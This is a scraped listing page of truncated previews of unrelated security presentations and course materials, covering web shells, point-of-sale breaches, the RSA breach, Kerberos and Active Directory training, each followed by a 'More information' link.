Ryan Kazanciyan Principal Consultant Old Web Shells, New Tricks AppSec DC 2012 Standard Disclaimer All information is derived from MANDIANT observations in non-classified environments Some information
More informationThat Point of Sale is a PoS
SESSION ID: HTA-W02 That Point of Sale is a PoS Charles Henderson Vice President Managed Security Testing Trustwave @angus_tx David Byrne Senior Security Associate Bishop Fox Agenda POS Architecture Breach
More informationWebsense Support Webinar: Questions and Answers
Websense Support Webinar: Questions and Answers Configuring Websense Web Security v7 with Your Directory Service Can updating to Native Mode from Active Directory (AD) Mixed Mode affect transparent user
More informationRSA Security Anatomy of an Attack Lessons learned
RSA Security Anatomy of an Attack Lessons learned Malcolm Dundas Account Executive John Hurley Senior Technology Consultant 1 Agenda Advanced Enterprise/ Threats The RSA Breach A chronology of the attack
More informationKerberos. Login via Password. Keys in Kerberos
Kerberos Chapter 2: Security Techniques Background Chapter 3: Security on Network and Transport Layer Chapter 4: Security on the Application Layer Secure Applications Network Authentication Service: Kerberos
More informationNE-6425C Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services
NE-6425C Configuring and Troubleshooting Windows Server 2008 Active Domain Services Summary Duration Vendor Audience 5 Days Microsoft IT Professionals Published Level Technology 02 June 2011 200 Windows
More information